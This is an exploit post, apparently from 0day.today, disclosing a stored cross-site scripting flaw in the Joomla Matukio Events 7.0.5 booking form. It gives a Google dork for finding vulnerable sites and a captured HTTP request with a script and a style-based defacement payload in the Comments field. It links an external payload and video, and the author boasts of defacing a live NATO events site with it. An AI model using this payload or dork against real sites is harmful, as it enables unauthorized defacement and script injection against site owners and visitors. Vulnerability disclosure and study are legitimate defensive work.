Joomla Matukio Events 7.0.5 Cross Site Scripting Vulnerability

# Exploit Title:Joomla Matukio Events  7.0.5 Stored XSS
# Author: Vincent666 ibn Winnie
# Software Link: https://matukio.compojoom.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
# Google Dorks: inurl:option=com_matukio


PoC:

I found simple , but interesting stored xss in Matukio Events.

https://matukio.compojoom.com/events/event/81-science/979-rocket-science

Press "Book Now":

Field "Comments" vulnerable to XSS and html code injection.

Put xss code and save this. It's works with different codes.

The code I like for the test:

https://pastebin.com/4V9sS7V3


Video:

https://youtu.be/HlTEcDqNxSM

Example on another site events.sto.nato.int

https://www.youtube.com/watch?v=pBY2UskIuNU



Host: matukio.compojoom.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data;
boundary=---------------------------9492328303638924271813324098

Content-Length: 2816

Origin: https://matukio.compojoom.com

Connection: keep-alive

Referer: https://matukio.compojoom.com/events/book/979-rocket-science

Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno;
_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744

Upgrade-Insecure-Requests: 1

nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13][email protected]&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background:
url(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg)
round;}</style><script>alert("Test
XSS")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1

(p.s.:
I don't publicly test the Joomla extensions anymore, but this time I
posted it publicly because I did xss art on the NATO site in this
component.)

#  0day.today [2021-09-17]  #